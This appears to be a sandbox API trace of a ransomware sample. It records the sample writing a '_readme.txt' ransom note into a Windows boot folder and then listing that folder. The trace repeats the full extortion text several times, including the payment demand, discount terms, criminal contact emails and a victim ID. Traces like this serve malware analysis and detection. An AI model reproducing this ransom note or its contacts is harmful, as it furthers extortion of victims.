[0127.860] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0127.860] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.860] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.861] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.861] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.861] FreeLibrary (hLibModule=0x759d0000) returned 1 [0127.861] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.861] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.861] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.861] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.861] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2b08 [0127.861] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0127.861] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.861] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.861] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0127.861] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x7d00) returned 0xdd2c688 [0127.861] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0127.861] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0127.861] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd3390 [0127.862] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0127.862] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8c0) returned 0x7516fe8 [0127.862] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x85c) returned 0x49db7d8 [0127.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x49db7d8, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 1117 [0127.862] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x49dc040 [0127.862] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db7d8 | out: hHeap=0x4970000) returned 1 [0127.862] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.862] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 1116 [0127.862] WriteFile (in: hFile=0x5c4, lpBuffer=0x49dc040*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0xe00fb64, lpOverlapped=0x0 | out: lpBuffer=0x49dc040*, lpNumberOfBytesWritten=0xe00fb64*=0x45c, lpOverlapped=0x0) returned 1 [0127.878] CloseHandle (hObject=0x5c4) returned 1 [0127.879] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dc040 | out: hHeap=0x4970000) returned 1 [0127.879] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0127.879] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0127.879] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.879] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.879] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0127.879] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.879] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0127.880] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0127.880] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36ef840, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe373bb00, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0127.880] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36ef840, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe373bb00, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0127.880] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0127.880] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.880] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0127.880] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0127.880] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.880] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.880] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.880] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.880] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.880] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.880] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.880] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.880] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.880] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.880] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.880] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.880] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.880] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.880] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.880] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.880] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.880] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.880] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.881] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.881] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.882] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.882] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.883] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.883] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.883] 